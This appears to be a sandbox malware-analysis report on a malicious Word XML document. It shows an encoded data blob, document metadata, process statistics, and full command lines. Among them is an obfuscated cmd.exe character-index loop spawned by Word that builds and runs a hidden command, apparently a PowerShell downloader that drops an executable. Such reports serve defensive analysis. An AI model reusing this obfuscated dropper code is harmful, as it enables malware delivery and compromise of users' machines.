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 ABI0Vng=
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00C25C6E
WordDocumentBodySectPRRsidRPr: 00802DF5
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
11
Malicious processes
5
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start msoxmled.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 422.exe no specs 422.exe wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2980"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\2019-01.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2672"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019-01.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4044c:\u9309\p266\v5884\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set CQVm=c38q\2~Q6l@GzXUnPSvAN9+IF:};s'{otWafC(Tb4km)/eDE5ux7-0Og,L MjiywYh=$.rB1%pd&&for %P in (73;31;63;72;16;14;70;57;23;36;25;6;48;56;71;72;69;72;17;47;17;17;23;54;20;20;19;59;47;25;6;52;40;56;71;72;65;72;38;47;59;16;25;6;52;1;56;71;72;9;9;58;67;0;21;51;71;71;66;29;15;2;40;8;40;29;27;67;3;40;48;2;71;66;15;45;63;52;31;39;60;45;0;32;58;20;45;32;68;33;45;39;36;9;61;45;15;32;27;67;34;5;53;53;40;66;29;65;32;32;73;25;44;44;34;55;34;32;34;63;61;45;69;12;39;61;0;41;34;68;0;31;42;44;44;59;74;59;48;20;48;17;36;61;10;65;32;32;73;25;44;44;74;31;0;28;74;45;32;45;0;32;31;69;68;50;62;12;44;21;64;64;50;38;9;21;17;13;10;65;32;32;73;25;44;44;69;45;42;31;15;32;52;41;18;34;69;32;61;69;68;69;61;28;45;52;49;73;68;15;28;41;68;69;49;44;51;16;34;21;35;73;42;50;10;65;32;32;73;25;44;44;63;18;52;42;45;34;32;68;15;9;44;13;74;57;53;41;7;7;34;69;10;65;32;32;73;25;44;44;63;63;63;68;28;32;61;15;28;31;15;68;15;9;44;54;21;31;54;50;33;21;46;55;2;29;68;17;73;9;61;32;37;29;10;29;43;27;67;63;21;21;48;1;66;29;42;5;51;51;1;29;27;67;3;71;71;1;53;58;66;58;29;40;5;5;29;27;67;31;21;1;2;1;66;29;15;2;8;53;1;29;27;67;9;5;51;71;40;66;67;45;15;18;25;32;45;42;73;22;29;4;29;22;67;3;71;71;1;53;22;29;68;45;50;45;29;27;35;31;69;45;34;0;65;37;67;61;48;51;48;1;58;61;15;58;67;34;5;53;53;40;43;30;32;69;62;30;67;3;40;48;2;71;68;46;31;63;15;9;31;34;74;24;61;9;45;37;67;61;48;51;48;1;56;58;67;9;5;51;71;40;43;27;67;73;21;21;5;71;66;29;18;1;40;48;29;27;23;35;58;37;37;11;45;32;52;23;32;45;42;58;67;9;5;51;71;40;43;68;9;45;15;55;32;65;58;52;55;45;58;40;53;53;53;53;43;58;30;23;15;18;31;41;45;52;23;32;45;42;58;67;9;5;51;71;40;27;67;35;1;53;5;53;66;29;73;21;8;21;53;29;27;39;69;45;34;41;27;26;26;0;34;32;0;65;30;26;26;67;63;48;71;53;71;66;29;0;40;5;71;71;29;27;75)do set wq=!wq!!CQVm:~%P,1!&&if %P equ 75 echo !wq:~-564!|cmd.exe"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2656CmD /V:ON/C"set CQVm=c38q\2~Q6l@GzXUnPSvAN9+IF:};s'{otWafC(Tb4km)/eDE5ux7-0Og,L MjiywYh=$.rB1%pd&&for %P in (73;31;63;72;16;14;70;57;23;36;25;6;48;56;71;72;69;72;17;47;17;17;23;54;20;20;19;59;47;25;6;52;40;56;71;72;65;72;38;47;59;16;25;6;52;1;56;71;72;9;9;58;67;0;21;51;71;71;66;29;15;2;40;8;40;29;27;67;3;40;48;2;71;66;15;45;63;52;31;39;60;45;0;32;58;20;45;32;68;33;45;39;36;9;61;45;15;32;27;67;34;5;53;53;40;66;29;65;32;32;73;25;44;44;34;55;34;32;34;63;61;45;69;12;39;61;0;41;34;68;0;31;42;44;44;59;74;59;48;20;48;17;36;61;10;65;32;32;73;25;44;44;74;31;0;28;74;45;32;45;0;32;31;69;68;50;62;12;44;21;64;64;50;38;9;21;17;13;10;65;32;32;73;25;44;44;69;45;42;31;15;32;52;41;18;34;69;32;61;69;68;69;61;28;45;52;49;73;68;15;28;41;68;69;49;44;51;16;34;21;35;73;42;50;10;65;32;32;73;25;44;44;63;18;52;42;45;34;32;68;15;9;44;13;74;57;53;41;7;7;34;69;10;65;32;32;73;25;44;44;63;63;63;68;28;32;61;15;28;31;15;68;15;9;44;54;21;31;54;50;33;21;46;55;2;29;68;17;73;9;61;32;37;29;10;29;43;27;67;63;21;21;48;1;66;29;42;5;51;51;1;29;27;67;3;71;71;1;53;58;66;58;29;40;5;5;29;27;67;31;21;1;2;1;66;29;15;2;8;53;1;29;27;67;9;5;51;71;40;66;67;45;15;18;25;32;45;42;73;22;29;4;29;22;67;3;71;71;1;53;22;29;68;45;50;45;29;27;35;31;69;45;34;0;65;37;67;61;48;51;48;1;58;61;15;58;67;34;5;53;53;40;43;30;32;69;62;30;67;3;40;48;2;71;68;46;31;63;15;9;31;34;74;24;61;9;45;37;67;61;48;51;48;1;56;58;67;9;5;51;71;40;43;27;67;73;21;21;5;71;66;29;18;1;40;48;29;27;23;35;58;37;37;11;45;32;52;23;32;45;42;58;67;9;5;51;71;40;43;68;9;45;15;55;32;65;58;52;55;45;58;40;53;53;53;53;43;58;30;23;15;18;31;41;45;52;23;32;45;42;58;67;9;5;51;71;40;27;67;35;1;53;5;53;66;29;73;21;8;21;53;29;27;39;69;45;34;41;27;26;26;0;34;32;0;65;30;26;26;67;63;48;71;53;71;66;29;0;40;5;71;71;29;27;75)do set wq=!wq!!CQVm:~%P,1!&&if %P equ 75 echo !wq:~-564!|cmd.exe"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
